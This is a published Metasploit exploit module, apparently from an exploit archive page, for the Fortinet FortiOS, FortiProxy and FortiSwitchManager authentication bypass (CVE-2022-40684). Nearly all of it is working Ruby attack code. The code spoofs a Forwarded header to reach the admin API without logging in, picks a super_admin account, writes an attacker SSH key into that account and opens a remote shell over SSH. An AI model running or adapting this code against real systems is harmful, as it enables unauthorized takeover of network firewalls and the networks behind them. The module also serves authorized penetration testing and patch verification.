Fortinet FortiOS / FortiProxy / FortiSwitchManager Authentication Bypass

This Metasploit module exploits an authentication bypass vulnerability in the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API to gain access to a chosen account. It then adds an SSH key to the authorized_keys file of that account, allowing you to log in to the system as that account. Successful exploitation results in remote code execution.


SHA-256 | 818eeb4d404c8cde2ab69451948a6037ca08bef60e2be65eb6fe9ed9d7ef0e7d

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::SSH
prepend Msf::Exploit::Remote::AutoCheck

attr_accessor :ssh_socket

# Declares the module metadata (name, description, authors, references,
# platform, the single FortiOS target, default options and notes) and
# registers the module-specific datastore options.
#
# @param info [Hash] metadata supplied by the caller; merged through update_info
def initialize(info = {})
  super(
    update_info(
      info,
      'Name' => 'Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.',
      'Description' => %q{
This module exploits an authentication bypass vulnerability
in the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API
to gain access to a chosen account. And then add a SSH key to the
authorized_keys file of the chosen account, allowing
to login to the system with the chosen account.

Successful exploitation results in remote code execution.
},
      'Author' => [
        'Heyder Andrade <@HeyderAndrade>', # Metasploit module
        'Zach Hanley <@hacks_zach>', # PoC
      ],
      'References' => [
        ['CVE', '2022-40684'],
        ['URL', 'https://www.fortiguard.com/psirt/FG-IR-22-377'],
        ['URL', 'https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684'],
      ],
      'License' => MSF_LICENSE,
      'DisclosureDate' => '2022-10-10', # Vendor advisory
      'Platform' => ['unix', 'linux'],
      'Arch' => [ARCH_CMD],
      'Privileged' => true,
      'Targets' => [
        [
          'FortiOS',
          {
            'DefaultOptions' => {
              'PAYLOAD' => 'generic/ssh/interact'
            },
            'Payload' => {
              'Compat' => {
                'PayloadType' => 'ssh_interact'
              }
            }
          }
        ]
      ],
      'DefaultTarget' => 0,
      'DefaultOptions' => {
        'RPORT' => 443,
        'SSL' => true
      },
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'Reliability' => [REPEATABLE_SESSION],
        'SideEffects' => [
          IOC_IN_LOGS,
          ARTIFACTS_ON_DISK # SSH key is added to authorized_keys file
        ]
      }
    )
  )

  register_options(
    [
      OptString.new('TARGETURI', [true, 'The base path to the Fortinet CMDB API', '/api/v2/cmdb/']),
      OptString.new('USERNAME', [false, 'Target username (Default: auto-detect)', nil]),
      OptString.new('PRIVATE_KEY', [false, 'SSH private key file path', nil]),
      OptString.new('KEY_PASS', [false, 'SSH private key password', nil]),
      # A port option rather than a free-form string, so the value is
      # validated and handed to the SSH/socket code as a port number.
      OptPort.new('SSH_RPORT', [true, 'SSH port to connect to', 22]),
      OptBool.new('PREFER_ADMIN', [false, 'Prefer to use the admin user if one is detected', true])
    ]
  )
end

# Account the module operates on.
#
# The USERNAME datastore option is used when it is set; otherwise the
# name comes from detect_username. The first truthy value is memoized
# in @username and returned on every later call.
#
# @return [String, nil] the account name
def username
  @username ||= (datastore['USERNAME'] || detect_username)
end

# Port of the SSH service, exactly as stored in the SSH_RPORT
# datastore option.
def ssh_rport
  configured_port = datastore['SSH_RPORT']
  configured_port
end

# Keys configured for the target account, as returned by read_keys.
# The list is fetched once and cached in @current_keys, so later calls
# keep returning the list as it was when first read.
def current_keys
  return @current_keys if @current_keys

  @current_keys = read_keys
end

# Key pair used for the SSH login, memoized in @ssh_keygen.
#
# When PRIVATE_KEY names a file, the key is loaded from it (optionally
# decrypted with KEY_PASS); otherwise a fresh prime256v1 EC key is
# generated. A blank PRIVATE_KEY is treated as unset.
#
# @return [OpenSSL::PKey::PKey] the private key object
def ssh_keygen
  @ssh_keygen ||= begin
    key_path = datastore['PRIVATE_KEY'].to_s
    if key_path.empty?
      OpenSSL::PKey::EC.generate('prime256v1')
    else
      # Positional arguments are (data, passphrase, ask_passphrase, filename).
      # Never prompt on the console for a passphrase: KEY_PASS is the only
      # source. The path is passed as the filename, not as the prompt flag.
      Net::SSH::KeyFactory.load_data_private_key(
        File.read(key_path),
        datastore['KEY_PASS'],
        false,
        key_path
      )
    end
  end
end

# PEM serialisation of the key returned by ssh_keygen.
def ssh_private_key
  key = ssh_keygen
  key.to_pem
end

# Base64 encoding of the public key blob (public_key.to_blob) of the
# key returned by ssh_keygen.
def ssh_pubkey
  blob = ssh_keygen.public_key.to_blob
  Rex::Text.encode_base64(blob)
end

# Line to store for the account, in the form
# "<ssh_type> <base64 public key> <username>@localhost".
def authorized_keys
  [ssh_keygen.ssh_type, ssh_pubkey, "#{username}@localhost"].join(' ')
end

# Sends an API request carrying the JSON content type, the
# 'Report Runner' user agent and a Forwarded header that names
# 127.0.0.1 with random ports. These are the only differences from
# the plain request that check expects to be answered with a 401.
#
# Top-level entries in +params+ override the defaults. Entries under
# 'headers' are merged with the Forwarded header instead of replacing
# it, so a caller adding its own headers keeps the Forwarded header.
#
# @param params [Hash] extra send_request_cgi options ('method', 'uri', 'data', ...)
# @return whatever send_request_cgi returns
def fortinet_request(params = {})
  spoofed_headers = {
    'Forwarded' => "for=\"[127.0.0.1]:#{rand(1024..65535)}\";by=\"[127.0.0.1]:#{rand(1024..65535)}\""
  }

  request = {
    'ctype' => 'application/json',
    'agent' => 'Report Runner'
  }.merge(params)
  request['headers'] = spoofed_headers.merge(params['headers'] || {})

  send_request_cgi(request)
end

# Determines whether the target is exploitable by this module.
#
# 1. A plain request to a random API path must be rejected with a 401.
# 2. The same API queried through fortinet_request must answer 200.
# 3. The SSH port must accept a TCP connection, since the exploit logs
#    in over SSH after planting the key.
#
# @return a CheckCode: Unknown when the target does not answer, Safe
#   when any step fails, Vulnerable otherwise
def check
  vprint_status("Checking #{datastore['RHOST']}:#{datastore['RPORT']}")
  # a normal request to the API should return a 401
  res = send_request_cgi({
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path, Rex::Text.rand_text_alpha_lower(6)),
    'ctype' => 'application/json'
  })

  return CheckCode::Unknown('Target did not respond to check.') unless res
  return CheckCode::Safe('Target seems not affected by this vulnerability.') unless res.code == 401

  # Try to bypass the authentication and read the system status; it
  # should return a 200 if vulnerable
  res = fortinet_request({
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path, '/system/status')
  })

  return CheckCode::Safe unless res&.code == 200

  version = res.get_json_document['version']

  print_good("Target is running the version #{version}, which is vulnerable.")

  # Socket.tcp raises when the connection cannot be made (refused, timed
  # out, unresolvable host); it never yields nil. A closed port therefore
  # has to be detected through the exception.
  begin
    Socket.tcp(rhost, ssh_rport, connect_timeout: datastore['SSH_TIMEOUT']) { |_sock| nil }
  rescue SystemCallError, SocketError, IOError
    return CheckCode::Safe("However SSH is not open, so adding a ssh key wouldn't give you access to the host.")
  end

  CheckCode::Vulnerable('And SSH is running which makes it exploitable.')
end

# Blanks the key slot holding our key once an SSH session was opened,
# then runs the inherited cleanup.
#
# The slot is derived from current_keys:
# * if the list already contains our key, that position is used;
# * otherwise the list is the memoized pre-insertion state. add_ssh_key
#   writes our key after at most two existing keys, so it sits at
#   position min(existing, 2) + 1.
#
# The slot is overwritten with an empty quoted value rather than
# deleted; per the original author the API did not respond to DELETE.
def cleanup
  return unless ssh_socket

  position = current_keys.index(authorized_keys)
  position = [current_keys.size, 2].min if position.nil?
  data = {
    "ssh-public-key#{position + 1}" => '""'
  }

  fortinet_request({
    'method' => 'PUT',
    'uri' => normalize_uri(target_uri.path, '/system/admin/', username),
    'data' => data.to_json
  })
ensure
  # Always let the mixins release their own resources, whether or not
  # our key had to be removed.
  super
end

# Picks an account to target from the administrator list of the API.
#
# Only accounts whose accprofile is 'super_admin' and whose trusthost1
# is '0.0.0.0 0.0.0.0' are considered. With PREFER_ADMIN set, 'admin'
# is chosen when it is among them and a random candidate otherwise;
# with it unset, a random candidate other than 'admin' is chosen.
#
# Fails the module instead of returning nil when the list cannot be
# read or no candidate is left.
#
# @return [String] the selected account name
def detect_username
  vprint_status('User auto-detection...')
  res = fortinet_request(
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path, '/system/admin')
  )
  fail_with(Failure::UnexpectedReply, 'Failed to list the administrator accounts') unless res&.code == 200

  accounts = res.get_json_document['results']
  accounts = [] unless accounts.is_a?(Array)
  eligible = accounts.select do |e|
    e.is_a?(Hash) && e['accprofile'] == 'super_admin' && e['trusthost1'] == '0.0.0.0 0.0.0.0'
  end
  users = eligible.map { |e| e['name'] }.compact

  # we prefer to use admin, but if it doesn't exist we chose a random one.
  chosen =
    if datastore['PREFER_ADMIN']
      vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, but if it isn't found we will pick a random one.")
      users.include?('admin') ? 'admin' : users.sample
    else
      vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, we will get a random that is not the admin.")
      (users - ['admin']).sample
    end

  fail_with(Failure::NotFound, 'No suitable account was detected, set USERNAME manually') unless chosen
  chosen
end

# Stores our key for the target account unless it is already present.
#
# The first two existing keys are kept and ours is appended after them,
# each written to its numbered ssh-public-keyN field. The request
# counts as successful only when the server replies with a 500 whose
# cli_error mentions "SSH key is good"; anything else fails the module.
def add_ssh_key
  existing = current_keys
  our_entry = authorized_keys

  if existing.include?(our_entry)
    # then we'll remove that on cleanup
    print_good('Your key is already in the authorized_keys file')
    return
  end

  vprint_status('Adding SSH key to authorized_keys file')

  # Our key goes last, after at most two keys that were already there
  payload = {}
  (existing.first(2) + [our_entry]).each_with_index do |key, position|
    payload["ssh-public-key#{position + 1}"] = "\"#{key}\""
  end

  res = fortinet_request({
    'method' => 'PUT',
    'uri' => normalize_uri(target_uri.path, '/system/admin/', username),
    'data' => payload.to_json
  })
  fail_with(Failure::UnexpectedReply, 'Failed to add SSH key to authorized_keys file.') unless res&.code == 500

  body = res.get_json_document
  accepted = body.key?('cli_error') && body['cli_error'] =~ /SSH key is good/
  fail_with(Failure::UnexpectedReply, 'Unexpected reponse from the server after adding the key.') unless accepted
end

# Reads the keys currently configured for the target account.
#
# The three ssh-public-keyN fields of the first result are returned in
# slot order with their double quotes removed. Slots that are missing,
# empty, or empty once the quotes are removed are skipped. That last
# case matches the bare pair of quotes cleanup writes to blank a slot.
#
# Fails the module when the reply is not a 200 or carries no account.
#
# @return [Array<String>] the configured keys, without blank slots
def read_keys
  vprint_status('Reading SSH key from authorized_keys file')
  res = fortinet_request({
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path, '/system/admin/', username)
  })
  fail_with(Failure::UnexpectedReply, 'Failed read current SSH keys') unless res&.code == 200

  results = res.get_json_document['results']
  result = results.first if results.is_a?(Array)
  unless result.is_a?(Hash)
    fail_with(Failure::UnexpectedReply, 'No account details returned while reading the current SSH keys')
  end

  %w[ssh-public-key1 ssh-public-key2 ssh-public-key3]
    .map { |slot| result[slot].to_s.delete('"') }
    .reject(&:empty?)
end

# Opens the SSH session as the target user and stores it in ssh_socket.
#
# The whole negotiation is bounded by SSH_TIMEOUT. Every failure is
# turned into a fail_with carrying the matching failure type, so
# callers never see a raw connection, timeout or SSH exception.
#
# @param ssh_options [Hash] options handed to Net::SSH.start
def do_login(ssh_options)
  # ensure we don't have a stale socket hanging around
  ssh_options[:proxy].proxies = nil if ssh_options[:proxy]
  begin
    ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
      self.ssh_socket = Net::SSH.start(rhost, username, ssh_options)
    end
  rescue Rex::ConnectionError
    fail_with(Failure::Unreachable, 'Could not connect to the SSH service')
  rescue Net::SSH::Disconnect, ::EOFError
    fail_with(Failure::Disconnected, 'Disconnected during negotiation')
  rescue ::Timeout::Error
    # Raised by Timeout.timeout above when SSH_TIMEOUT elapses
    fail_with(Failure::TimeoutExpired, 'Timed out during negotiation')
  rescue Net::SSH::AuthenticationFailed
    fail_with(Failure::NoAccess, 'Failed authentication')
  rescue Net::SSH::Exception => e
    fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
  end

  fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket
end

# Entry point of the module: plants the key for the target user, logs
# in over SSH with public-key authentication and hands the resulting
# connection to the payload handler.
def exploit
  print_status("Executing exploit on #{datastore['RHOST']}:#{datastore['RPORT']} target user: #{username}")
  add_ssh_key
  vprint_status('Establishing SSH connection')

  base_options = ssh_client_defaults
  ssh_options = base_options.merge(
    {
      auth_methods: ['publickey'],
      key_data: [ssh_private_key],
      port: ssh_rport
    }
  )
  # Verbose SSH output only when SSH_DEBUG is set
  ssh_options[:verbose] = :debug if datastore['SSH_DEBUG']

  do_login(ssh_options)

  handler(ssh_socket)
end
end

Related Posts